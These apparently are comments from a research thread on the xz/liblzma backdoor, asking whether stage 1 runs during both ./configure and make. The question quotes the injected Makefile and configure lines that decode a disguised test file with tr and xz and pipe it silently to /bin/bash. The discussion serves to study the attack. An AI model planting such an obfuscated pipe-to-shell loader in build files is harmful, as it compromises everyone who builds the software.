I have a work-in-progress decomp(aka i booted up Ghidra and imported the .o file) and I suggest using the main repo as a space for the decomp. You don't have to use mine, you can make your own, just suggesting that.

Hey, first of all, thank you very much for this wiki. I recently took interest in this specific backdoor and security research in general, and this kind of report is really helpful.

My question is, inside the Makefile (after being modified by the stage 2 script), we can find these lines (extracted from Andres' mail):

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as:
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Which is stage 1 that gets executed piping it to the bash shell. The thing is, I thought that stage 1 was executed during ./configure as in the this file we can find:

eval $gl_config_gt | $SHELL 2>/dev/null ;;

Where gl_config_gt="eval $gl_localedir_config" and gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'.

Which is also stage 1. Is stage 1 being executed twice? What triggers the first execution of stage 1?

I assumed that by doing

./configure
make
make install

The flow was ./configure->stage1-stage2->patched malicious Makefile generated->make (will now link the malicious liblzma_la-crc64_fast.o into the build, previously also generated by stage 2)->make install.

Why does the make also execute stage1 (that will also launch stage 2)? Or does it? (I don't know if I'm misinterpreting) I guess there's something I just don't see, probably lol, I am just not familiarized at all with Autotools or any of this in general xD, so apologies if the question is too obvious.